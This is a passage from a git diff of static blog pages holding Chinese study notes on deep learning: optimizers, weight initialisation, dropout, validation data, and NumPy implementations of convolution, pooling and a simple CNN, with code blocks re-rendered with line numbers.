          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-6-\344\270\216\345\255\246\344\271\240\347\233\270\345\205\263\347\232\204\346\212\200\345\267\247/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-6-\344\270\216\345\255\246\344\271\240\347\233\270\345\205\263\347\232\204\346\212\200\345\267\247/index.html" index b30debf8e2..f76a60c3a9 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-6-\344\270\216\345\255\246\344\271\240\347\233\270\345\205\263\347\232\204\346\212\200\345\267\247/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-6-\344\270\216\345\255\246\344\271\240\347\233\270\345\205\263\347\232\204\346\212\200\345\267\247/index.html" @@ -44,8 +44,6 @@ - - @@ -405,7 +403,7 @@

          正文

          6.1 参数的更新

          6.1.2 SGD

          $$\mathbf W\leftarrow \mathbf W -\eta\frac{\partial L}{\partial \mathbf W}$$

          -
          class SGD:
          def __init__(self, lr=0.01):
          self.lr = lr

          def update(self, params, grads):
          for key in params.keys():
          params[key] -= self.lr * grads[key]
          +
          1
          2
          3
          4
          5
          6
          7
          class SGD:
          def __init__(self, lr=0.01):
          self.lr = lr

          def update(self, params, grads):
          for key in params.keys():
          params[key] -= self.lr * grads[key]

          6.1.3 SGD 的缺点

          png

          如果函数的形状非均向(anisotropic),比如呈延伸状,搜索的路径就会非常低效。因此,我们需要比单纯朝梯度方向前进的 SGD 更聪明的方法。SGD 低效的根本原因是,梯度的方向并没有指向最小值的方向(指向极小值的方向)。

          @@ -424,7 +422,7 @@

          6.1.4 Momentum

          $\alpha v$ 这一项。在物体不受任何力时,该项承担使物体逐渐减速的任务($\alpha$ 设定为 0.9 之类的值),对应物理上的地面摩擦或空气阻力。

        -
        class Momentum:
        def __init__(self, lr=0.01, momentum=0.9):
        self.lr = lr
        self.momentum = momentum
        self.v = None


        def update(self, params, grads):
        if self.v is None:
        self.v = {}
        for key, val in params.items():
        self.v[key] = np.zeros_like(val)

        for key in params.keys():
        self.v[key] = self.momentum * self.v[key] - self.lr * grads[key]
        params[key] += self.v[key]
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        class Momentum:
        def __init__(self, lr=0.01, momentum=0.9):
        self.lr = lr
        self.momentum = momentum
        self.v = None


        def update(self, params, grads):
        if self.v is None:
        self.v = {}
        for key, val in params.items():
        self.v[key] = np.zeros_like(val)

        for key in params.keys():
        self.v[key] = self.momentum * self.v[key] - self.lr * grads[key]
        params[key] += self.v[key]

        6.1.5 AdaGrad

        在神经网络的学习中,学习率(数学式中记为 $\eta$)的值很重要。

          @@ -442,13 +440,13 @@

          6.1.5 AdaGrad

          AdaGrad 会记录过去所有梯度的平方和。因此,学习越深入,更新的幅度就越小。实际上,如果无止境地学习,更新量就会变为 0,完全不再更新。为了改善这个问题,可以使用 RMSProp 方法。RMSProp 方法并不是将过去所有的梯度一视同仁地相加,而是逐渐地遗忘过去的梯度,在做加法运算时将新梯度的信息更多地反映出来。这种操作从专业上讲,称为“指数移动平均”,呈指数函数式地减小过去的梯度的尺度。

          -
          class AdaGrad:
          def __init__(self, lr=0.01):
          self.lr = lr
          self.h = None


          def update(self, params, grads):
          if self.h is None:
          self.h = {}
          for key, val in params.items():
          self.h[key] = np.zeros_like(val)

          for key in params.keys():
          self.h[key] += grads[key] * grads[key]
          params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          class AdaGrad:
          def __init__(self, lr=0.01):
          self.lr = lr
          self.h = None


          def update(self, params, grads):
          if self.h is None:
          self.h = {}
          for key, val in params.items():
          self.h[key] = np.zeros_like(val)

          for key in params.keys():
          self.h[key] += grads[key] * grads[key]
          params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)

          6.1.6 Adam

          Adam 是 2015 年提出的新方法。它的理论有些复杂,直观地讲,就是融合了 Momentum 和 AdaGrad 的方法。通过组合前面两个方法的优点,有望实现参数空间的高效搜索。此外,进行超参数的“偏置校正”也是 Adam 的特征。

          Adam 会设置 3 个超参数。一个是学习率(论文中以 $\alpha$ 出现),另外两个是一次 momentum 系数 $\beta_1$ 和二次 momentum 系数 $\beta_2$。根据论文,标准的设定值是 $\beta_1$ 为 0.9,$\beta_2$ 为 0.999。设置了这些值后,大多数情况下都能顺利运行。

          -
          class Adam:
          """Adam (http://arxiv.org/abs/1412.6980v8)"""
          def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):
          self.lr = lr
          self.beta1 = beta1
          self.beta2 = beta2
          self.iter = 0
          self.m = None
          self.v = None


          def update(self, params, grads):
          if self.m is None:
          self.m, self.v = {}, {}
          for key, val in params.items():
          self.m[key] = np.zeros_like(val)
          self.v[key] = np.zeros_like(val)
          self.iter += 1
          lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iter) / (1.0 - self.beta1**self.iter)
          for key in params.keys():
          self.m[key] += (1 - self.beta1) * (grads[key] - self.m[key])
          self.v[key] += (1 - self.beta2) * (grads[key]**2 - self.v[key])
          params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + 1e-7)
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          23
          class Adam:
          """Adam (http://arxiv.org/abs/1412.6980v8)"""
          def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):
          self.lr = lr
          self.beta1 = beta1
          self.beta2 = beta2
          self.iter = 0
          self.m = None
          self.v = None


          def update(self, params, grads):
          if self.m is None:
          self.m, self.v = {}, {}
          for key, val in params.items():
          self.m[key] = np.zeros_like(val)
          self.v[key] = np.zeros_like(val)
          self.iter += 1
          lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iter) / (1.0 - self.beta1**self.iter)
          for key in params.keys():
          self.m[key] += (1 - self.beta1) * (grads[key] - self.m[key])
          self.v[key] += (1 - self.beta2) * (grads[key]**2 - self.v[key])
          params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + 1e-7)

          很多研究中至今仍在使用 SGD。Momentum 和 AdaGrad 也是值得一试的方法。最近,很多研究人员和技术人员都喜欢用 Adam。

          6.2 权重的初始值

          6.2.1 可以将权重初始值设为 0 吗

          @@ -457,7 +455,7 @@

          node_num = 100 # 前一层的节点数
          w = np.random.randn(node_num, node_num) / np.sqrt(node_num)
          +
          1
          2
          node_num = 100 # 前一层的节点数
          w = np.random.randn(node_num, node_num) / np.sqrt(node_num)

          png

          6.2.3 ReLU 的权重初始值

          Xavier 初始值是以激活函数是线性函数为前提而推导出来的。因为 sigmoid 函数和 tanh 函数左右对称,且中央附近可以视作线性函数,所以适合使用 Xavier 初始值。但当激活函数使用 ReLU 时,一般推荐使用 ReLU 专用的初始值,也就是 Kaiming He 等人推荐的初始值,也称为“He 初始值”。

          @@ -510,14 +508,14 @@

          6.4.3 Dropout

          Dropout 是一种在学习的过程中随机删除神经元的方法。训练时,随机选出隐藏层的神经元,然后将其删除。

          -
          class Dropout:
          def __init__(self, dropout_ratio=0.5):
          self.dropout_ratio = dropout_ratio
          self.mask = None


          def forward(self, x, train_flg=True):
          if train_flg:
          self.mask = np.random.rand(*x.shape) > self.dropout_ratio
          return x * self.mask
          else:
          return x * (1.0 - self.dropout_ratio)


          def backward(self, dout):
          return dout * self.mask
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          class Dropout:
          def __init__(self, dropout_ratio=0.5):
          self.dropout_ratio = dropout_ratio
          self.mask = None


          def forward(self, x, train_flg=True):
          if train_flg:
          self.mask = np.random.rand(*x.shape) > self.dropout_ratio
          return x * self.mask
          else:
          return x * (1.0 - self.dropout_ratio)


          def backward(self, dout):
          return dout * self.mask

          6.5 超参数的验证

          超参数(hyper-parameter)也经常出现。这里所说的超参数是指,比如各层的神经元数量、batch 大小、参数更新时的学习率或权值衰减等。如果这些超参数没有设置合适的值,模型的性能就会很差。

          6.5.1 验证数据

          如果使用测试数据调整超参数,超参数的值会对测试数据发生过拟合。换句话说,用测试数据确认超参数的值的“好坏”,就会导致超参数的值被调整为只拟合测试数据。

          调整超参数时,必须使用超参数专用的确认数据。用于调整超参数的数据,一般称为验证数据(validation data)

          如果是 MNIST 数据集,获得验证数据的最简单的方法就是从训练数据中事先分割 20%作为验证数据:

          -
          (x_train, t_train), (x_test, t_test) = load_mnist()
          # 打乱训练数据
          x_train, t_train = shuffle_dataset(x_train, t_train)
          # 分割验证数据
          validation_rate = 0.20
          validation_num = int(x_train.shape[0] * validation_rate)
          x_val = x_train[:validation_num]
          t_val = t_train[:validation_num]
          x_train = x_train[validation_num:]
          t_train = t_train[validation_num:]
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          (x_train, t_train), (x_test, t_test) = load_mnist()
          # 打乱训练数据
          x_train, t_train = shuffle_dataset(x_train, t_train)
          # 分割验证数据
          validation_rate = 0.20
          validation_num = int(x_train.shape[0] * validation_rate)
          x_val = x_train[:validation_num]
          t_val = t_train[:validation_num]
          x_train = x_train[validation_num:]
          t_train = t_train[validation_num:]

          6.5.2 超参数的最优化

          步骤 0 设定超参数的范围。

          步骤 1 从设定的超参数范围中随机采样。

          @@ -4476,6 +4474,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-7-\345\215\267\347\247\257\347\245\236\347\273\217\347\275\221\347\273\234/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-7-\345\215\267\347\247\257\347\245\236\347\273\217\347\275\221\347\273\234/index.html" index 4470375bb4..25e2ca40ee 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-7-\345\215\267\347\247\257\347\245\236\347\273\217\347\275\221\347\273\234/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-7-\345\215\267\347\247\257\347\245\236\347\273\217\347\275\221\347\273\234/index.html" @@ -44,8 +44,6 @@ - - @@ -456,15 +454,15 @@

          7.3

          7.4 卷积层和池化层的实现

          7.4.1 4 维数组

          所谓 4 维数据,比如数据的形状是(10, 1, 28, 28),则它对应 10 个高为 28、长为 28、通道为 1 的数据。

          -
          x = np.random.rand(10, 1, 28, 28)
          x.shape
          +
          1
          2
          x = np.random.rand(10, 1, 28, 28)
          x.shape
          (10, 1, 28, 28)
           

          访问第 1 个数据:

          -
          x[0].shape
          +
          1
          x[0].shape
          (1, 28, 28)
           

          访问第 1 个数据的第 1 个通道的空间数据:

          -
          x[0, 0]  # 或 x[0][0]
          +
          1
          x[0, 0]  # 或 x[0][0]

          7.4.2 基于 im2col 的展开

          如果老老实实地实现卷积运算,估计要重复好几层的for语句。这样的实现有点麻烦,而且,NumPy 中存在使用 for 语句后处理变慢的缺点(NumPy 中,访问元素时最好不要用for语句)。

          im2col是一个函数,将输入数据展开以适合滤波器(权重)。对 3 维的输入数据应用im2col后,数据转换为 2 维矩阵(正确地讲,是把包含批数量的 4 维数据转换成了 2 维数据)。

          @@ -491,16 +489,16 @@

          import sys, os
          sys.path.append(os.pardir)
          from common.util import im2col

          x1 = np.random.rand(1, 3, 7, 7)
          col1 = im2col(x1, 5, 5, stride=1, pad=0)
          print(col1.shape) # (9, 75)

          x2 = np.random.rand(10, 3, 7, 7) # 10 个数据
          col2 = im2col(x2, 5, 5, stride=1, pad=0)
          print(col2.shape) # (90, 75)
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          import sys, os
          sys.path.append(os.pardir)
          from common.util import im2col

          x1 = np.random.rand(1, 3, 7, 7)
          col1 = im2col(x1, 5, 5, stride=1, pad=0)
          print(col1.shape) # (9, 75)

          x2 = np.random.rand(10, 3, 7, 7) # 10 个数据
          col2 = im2col(x2, 5, 5, stride=1, pad=0)
          print(col2.shape) # (90, 75)
          (9, 75)
           (90, 75)
           

          使用 im2col 来实现卷积层:

          -
          class Convolution:


          def __init__(self, W, b, stride=1, pad=0):
          """
          将滤波器(权重)、偏置、步幅、填充作为参数接收。
          滤波器是(FN, C, FH, FW) 的 4 维形状。
          另外,FN、C、FH、FW 分别是 Filter Number(滤波器数量)、Channel、Filter Height、Filter Width 的缩写。
          """
          self.W = W
          self.b = b
          self.stride = stride
          self.pad = pad


          def forward(self, x):
          FN, C, FH, FW = self.W.shape
          N, C, H, W = x.shape
          out_h = int(1 + (H + 2*self.pad - FH) / self.stride)
          out_w = int(1 + (W + 2*self.pad - FW) / self.stride)
          col = im2col(x, FH, FW, self.stride, self.pad)
          col_W = self.W.reshape(FN, -1).T # 滤波器的展开
          out = np.dot(col, col_W) + self.b
          out = out.reshape(N, out_h, out_w, -1).transpose(0, 3, 1, 2) # 修改轴顺序
          return out
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          23
          24
          25
          class Convolution:


          def __init__(self, W, b, stride=1, pad=0):
          """
          将滤波器(权重)、偏置、步幅、填充作为参数接收。
          滤波器是(FN, C, FH, FW) 的 4 维形状。
          另外,FN、C、FH、FW 分别是 Filter Number(滤波器数量)、Channel、Filter Height、Filter Width 的缩写。
          """
          self.W = W
          self.b = b
          self.stride = stride
          self.pad = pad


          def forward(self, x):
          FN, C, FH, FW = self.W.shape
          N, C, H, W = x.shape
          out_h = int(1 + (H + 2*self.pad - FH) / self.stride)
          out_w = int(1 + (W + 2*self.pad - FW) / self.stride)
          col = im2col(x, FH, FW, self.stride, self.pad)
          col_W = self.W.reshape(FN, -1).T # 滤波器的展开
          out = np.dot(col, col_W) + self.b
          out = out.reshape(N, out_h, out_w, -1).transpose(0, 3, 1, 2) # 修改轴顺序
          return out

          7.4.4 池化层的实现

          png

          池化的应用区域按通道单独展开。

          -
          class Pooling:


          def __init__(self, pool_h, pool_w, stride=1, pad=0):
          self.pool_h = pool_h
          self.pool_w = pool_w
          self.stride = stride
          self.pad = pad


          def forward(self, x):
          N, C, H, W = x.shape
          out_h = int(1 + (H - self.pool_h) / self.stride)
          out_w = int(1 + (W - self.pool_w) / self.stride)
          # 展开(1)
          col = im2col(x, self.pool_h, self.pool_w, self.stride, self.pad)
          col = col.reshape(-1, self.pool_h*self.pool_w)
          # 最大值(2)
          out = np.max(col, axis=1)
          # 转换(3)
          out = out.reshape(N, out_h, out_w, C).transpose(0, 3, 1, 2)
          return out
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          class Pooling:


          def __init__(self, pool_h, pool_w, stride=1, pad=0):
          self.pool_h = pool_h
          self.pool_w = pool_w
          self.stride = stride
          self.pad = pad


          def forward(self, x):
          N, C, H, W = x.shape
          out_h = int(1 + (H - self.pool_h) / self.stride)
          out_w = int(1 + (W - self.pool_w) / self.stride)
          # 展开(1)
          col = im2col(x, self.pool_h, self.pool_w, self.stride, self.pad)
          col = col.reshape(-1, self.pool_h*self.pool_w)
          # 最大值(2)
          out = np.max(col, axis=1)
          # 转换(3)
          out = out.reshape(N, out_h, out_w, C).transpose(0, 3, 1, 2)
          return out

          池化层的实现按下面 3 个阶段:

          • @@ -514,7 +512,7 @@

            7.5 CNN 的实现

            -
            class SimpleConvNet:
            """简单的 ConvNet

            conv - relu - pool - affine - relu - affine - softmax

            Parameters
            ----------
            input_size : 输入大小(MNIST 的情况下为 784)
            hidden_size_list : 隐藏层的神经元数量的列表(e.g. [100, 100, 100])
            output_size : 输出大小(MNIST 的情况下为 10)
            activation : 'relu' or 'sigmoid'
            weight_init_std : 指定权重的标准差(e.g. 0.01)
            指定'relu'或'he'的情况下设定“He 的初始值”
            指定'sigmoid'或'xavier'的情况下设定“Xavier 的初始值”
            """
            def __init__(self, input_dim=(1, 28, 28),
            conv_param={'filter_num':30, 'filter_size':5, 'pad':0, 'stride':1},
            hidden_size=100, output_size=10, weight_init_std=0.01):
            filter_num = conv_param['filter_num']
            filter_size = conv_param['filter_size']
            filter_pad = conv_param['pad']
            filter_stride = conv_param['stride']
            input_size = input_dim[1]
            conv_output_size = (input_size - filter_size + 2*filter_pad) / filter_stride + 1
            pool_output_size = int(filter_num * (conv_output_size/2) * (conv_output_size/2))

            # 初始化权重
            self.params = {}
            self.params['W1'] = weight_init_std * np.random.randn(filter_num, input_dim[0], filter_size, filter_size)
            self.params['b1'] = np.zeros(filter_num)
            self.params['W2'] = weight_init_std * np.random.randn(pool_output_size, hidden_size)
            self.params['b2'] = np.zeros(hidden_size)
            self.params['W3'] = weight_init_std * np.random.randn(hidden_size, output_size)
            self.params['b3'] = np.zeros(output_size)

            # 生成层
            self.layers = OrderedDict()
            self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],
            conv_param['stride'], conv_param['pad'])
            self.layers['Relu1'] = Relu()
            self.layers['Pool1'] = Pooling(pool_h=2, pool_w=2, stride=2)
            self.layers['Affine1'] = Affine(self.params['W2'], self.params['b2'])
            self.layers['Relu2'] = Relu()
            self.layers['Affine2'] = Affine(self.params['W3'], self.params['b3'])

            self.last_layer = SoftmaxWithLoss()

            def predict(self, x):
            for layer in self.layers.values():
            x = layer.forward(x)

            return x

            def loss(self, x, t):
            """
            求损失函数
            参数 x 是输入数据、t 是教师标签
            """
            y = self.predict(x)
            return self.last_layer.forward(y, t)

            def accuracy(self, x, t, batch_size=100):
            if t.ndim != 1 : t = np.argmax(t, axis=1)

            acc = 0.0

            for i in range(int(x.shape[0] / batch_size)):
            tx = x[i*batch_size:(i+1)*batch_size]
            tt = t[i*batch_size:(i+1)*batch_size]
            y = self.predict(tx)
            y = np.argmax(y, axis=1)
            acc += np.sum(y == tt)

            return acc / x.shape[0]

            def numerical_gradient(self, x, t):
            """求梯度(数值微分)

            Parameters
            ----------
            x : 输入数据
            t : 教师标签

            Returns
            -------
            具有各层的梯度的字典变量
            grads['W1']、grads['W2']、...是各层的权重
            grads['b1']、grads['b2']、...是各层的偏置
            """
            loss_w = lambda w: self.loss(x, t)

            grads = {}
            for idx in (1, 2, 3):
            grads['W' + str(idx)] = numerical_gradient(loss_w, self.params['W' + str(idx)])
            grads['b' + str(idx)] = numerical_gradient(loss_w, self.params['b' + str(idx)])

            return grads

            def gradient(self, x, t):
            """求梯度(误差反向传播法)

            Parameters
            ----------
            x : 输入数据
            t : 教师标签

            Returns
            -------
            具有各层的梯度的字典变量
            grads['W1']、grads['W2']、...是各层的权重
            grads['b1']、grads['b2']、...是各层的偏置
            """
            # forward
            self.loss(x, t)

            # backward
            dout = 1
            dout = self.last_layer.backward(dout)

            layers = list(self.layers.values())
            layers.reverse()
            for layer in layers:
            dout = layer.backward(dout)

            # 设定
            grads = {}
            grads['W1'], grads['b1'] = self.layers['Conv1'].dW, self.layers['Conv1'].db
            grads['W2'], grads['b2'] = self.layers['Affine1'].dW, self.layers['Affine1'].db
            grads['W3'], grads['b3'] = self.layers['Affine2'].dW, self.layers['Affine2'].db

            return grads

            def save_params(self, file_name="params.pkl"):
            params = {}
            for key, val in self.params.items():
            params[key] = val
            with open(file_name, 'wb') as f:
            pickle.dump(params, f)

            def load_params(self, file_name="params.pkl"):
            with open(file_name, 'rb') as f:
            params = pickle.load(f)
            for key, val in params.items():
            self.params[key] = val

            for i, key in enumerate(['Conv1', 'Affine1', 'Affine2']):
            self.layers[key].W = self.params['W' + str(i+1)]
            self.layers[key].b = self.params['b' + str(i+1)]
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            36
            37
            38
            39
            40
            41
            42
            43
            44
            45
            46
            47
            48
            49
            50
            51
            52
            53
            54
            55
            56
            57
            58
            59
            60
            61
            62
            63
            64
            65
            66
            67
            68
            69
            70
            71
            72
            73
            74
            75
            76
            77
            78
            79
            80
            81
            82
            83
            84
            85
            86
            87
            88
            89
            90
            91
            92
            93
            94
            95
            96
            97
            98
            99
            100
            101
            102
            103
            104
            105
            106
            107
            108
            109
            110
            111
            112
            113
            114
            115
            116
            117
            118
            119
            120
            121
            122
            123
            124
            125
            126
            127
            128
            129
            130
            131
            132
            133
            134
            135
            136
            137
            138
            139
            140
            141
            142
            143
            144
            145
            146
            147
            148
            class SimpleConvNet:
            """简单的 ConvNet

            conv - relu - pool - affine - relu - affine - softmax

            Parameters
            ----------
            input_size : 输入大小(MNIST 的情况下为 784)
            hidden_size_list : 隐藏层的神经元数量的列表(e.g. [100, 100, 100])
            output_size : 输出大小(MNIST 的情况下为 10)
            activation : 'relu' or 'sigmoid'
            weight_init_std : 指定权重的标准差(e.g. 0.01)
            指定'relu'或'he'的情况下设定“He 的初始值”
            指定'sigmoid'或'xavier'的情况下设定“Xavier 的初始值”
            """
            def __init__(self, input_dim=(1, 28, 28),
            conv_param={'filter_num':30, 'filter_size':5, 'pad':0, 'stride':1},
            hidden_size=100, output_size=10, weight_init_std=0.01):
            filter_num = conv_param['filter_num']
            filter_size = conv_param['filter_size']
            filter_pad = conv_param['pad']
            filter_stride = conv_param['stride']
            input_size = input_dim[1]
            conv_output_size = (input_size - filter_size + 2*filter_pad) / filter_stride + 1
            pool_output_size = int(filter_num * (conv_output_size/2) * (conv_output_size/2))

            # 初始化权重
            self.params = {}
            self.params['W1'] = weight_init_std * np.random.randn(filter_num, input_dim[0], filter_size, filter_size)
            self.params['b1'] = np.zeros(filter_num)
            self.params['W2'] = weight_init_std * np.random.randn(pool_output_size, hidden_size)
            self.params['b2'] = np.zeros(hidden_size)
            self.params['W3'] = weight_init_std * np.random.randn(hidden_size, output_size)
            self.params['b3'] = np.zeros(output_size)

            # 生成层
            self.layers = OrderedDict()
            self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],
            conv_param['stride'], conv_param['pad'])
            self.layers['Relu1'] = Relu()
            self.layers['Pool1'] = Pooling(pool_h=2, pool_w=2, stride=2)
            self.layers['Affine1'] = Affine(self.params['W2'], self.params['b2'])
            self.layers['Relu2'] = Relu()
            self.layers['Affine2'] = Affine(self.params['W3'], self.params['b3'])

            self.last_layer = SoftmaxWithLoss()

            def predict(self, x):
            for layer in self.layers.values():
            x = layer.forward(x)

            return x

            def loss(self, x, t):
            """
            求损失函数
            参数 x 是输入数据、t 是教师标签
            """
            y = self.predict(x)
            return self.last_layer.forward(y, t)

            def accuracy(self, x, t, batch_size=100):
            if t.ndim != 1 : t = np.argmax(t, axis=1)

            acc = 0.0

            for i in range(int(x.shape[0] / batch_size)):
            tx = x[i*batch_size:(i+1)*batch_size]
            tt = t[i*batch_size:(i+1)*batch_size]
            y = self.predict(tx)
            y = np.argmax(y, axis=1)
            acc += np.sum(y == tt)

            return acc / x.shape[0]

            def numerical_gradient(self, x, t):
            """求梯度(数值微分)

            Parameters
            ----------
            x : 输入数据
            t : 教师标签

            Returns
            -------
            具有各层的梯度的字典变量
            grads['W1']、grads['W2']、...是各层的权重
            grads['b1']、grads['b2']、...是各层的偏置
            """
            loss_w = lambda w: self.loss(x, t)

            grads = {}
            for idx in (1, 2, 3):
            grads['W' + str(idx)] = numerical_gradient(loss_w, self.params['W' + str(idx)])
            grads['b' + str(idx)] = numerical_gradient(loss_w, self.params['b' + str(idx)])

            return grads

            def gradient(self, x, t):
            """求梯度(误差反向传播法)

            Parameters
            ----------
            x : 输入数据
            t : 教师标签

            Returns
            -------
            具有各层的梯度的字典变量
            grads['W1']、grads['W2']、...是各层的权重
            grads['b1']、grads['b2']、...是各层的偏置
            """
            # forward
            self.loss(x, t)

            # backward
            dout = 1
            dout = self.last_layer.backward(dout)

            layers = list(self.layers.values())
            layers.reverse()
            for layer in layers:
            dout = layer.backward(dout)

            # 设定
            grads = {}
            grads['W1'], grads['b1'] = self.layers['Conv1'].dW, self.layers['Conv1'].db
            grads['W2'], grads['b2'] = self.layers['Affine1'].dW, self.layers['Affine1'].db
            grads['W3'], grads['b3'] = self.layers['Affine2'].dW, self.layers['Affine2'].db

            return grads

            def save_params(self, file_name="params.pkl"):
            params = {}
            for key, val in self.params.items():
            params[key] = val
            with open(file_name, 'wb') as f:
            pickle.dump(params, f)

            def load_params(self, file_name="params.pkl"):
            with open(file_name, 'rb') as f:
            params = pickle.load(f)
            for key, val in params.items():
            self.params[key] = val

            for i, key in enumerate(['Conv1', 'Affine1', 'Affine2']):
            self.layers[key].W = self.params['W' + str(i+1)]
            self.layers[key].b = self.params['b' + str(i+1)]

            如果使用 MNIST 数据集训练 SimpleConvNet,则训练数据的识别率为 99.82%,测试数据的识别率为 98.96%(每次学习的识别精度都会发生一些误差)。测试数据的识别率大约为 99%,就小型网络来说,这是一个非常高的识别率。

            7.7 具有代表性的 CNN

            png

            @@ -4485,6 +4483,8 @@

            目录

            var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-8-\346\267\261\345\272\246\345\255\246\344\271\240/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-8-\346\267\261\345\272\246\345\255\246\344\271\240/index.html" index 70ac87ec53..8184e1442a 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-8-\346\267\261\345\272\246\345\255\246\344\271\240/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-8-\346\267\261\345\272\246\345\255\246\344\271\240/index.html" @@ -44,8 +44,6 @@ - - @@ -4491,6 +4489,8 @@

            目录

            var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-1-\347\245\236\347\273\217\347\275\221\347\273\234\347\232\204\345\244\215\344\271\240/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-1-\347\245\236\347\273\217\347\275\221\347\273\234\347\232\204\345\244\215\344\271\240/index.html" index 2ad06163a7..b62234292d 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-1-\347\245\236\347\273\217\347\275\221\347\273\234\347\232\204\345\244\215\344\271\240/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-1-\347\245\236\347\273\217\347\275\221\347\273\234\347\232\204\345\244\215\344\271\240/index.html" @@ -44,8 +44,6 @@ - - @@ -404,16 +402,16 @@

            DL-深度学习进阶-自然语言处理-1-神经网络的复习

            正文

            1.4 使用神经网络解决问题

            1.4.1 螺旋状数据集

            -
            import sys
            sys.path.append('..') # 为了引入父目录的文件而进行的设定
            from dataset import spiral
            import matplotlib.pyplot as plt

            x, t = spiral.load_data()
            print('x', x.shape) # (300, 2)
            print('t', t.shape) # (300, 3)
            +
            1
            2
            3
            4
            5
            6
            7
            8
            import sys
            sys.path.append('..') # 为了引入父目录的文件而进行的设定
            from dataset import spiral
            import matplotlib.pyplot as plt

            x, t = spiral.load_data()
            print('x', x.shape) # (300, 2)
            print('t', t.shape) # (300, 3)
            x (300, 2)
             t (300, 3)
             
            -
            # 绘制数据点
            N = 100
            CLS_NUM = 3
            markers = ['o', 'x', '^']
            for i in range(CLS_NUM):
            plt.scatter(x[i * N:(i + 1) * N, 0], x[i * N: (i + 1) * N, 1], s=40, marker=markers[i])
            plt.show()
            +
            1
            2
            3
            4
            5
            6
            7
            # 绘制数据点
            N = 100
            CLS_NUM = 3
            markers = ['o', 'x', '^']
            for i in range(CLS_NUM):
            plt.scatter(x[i * N:(i + 1) * N, 0], x[i * N: (i + 1) * N, 1], s=40, marker=markers[i])
            plt.show()

            png

            1.4.2 神经网络的实现

            -
            import sys
            sys.path.append('..')
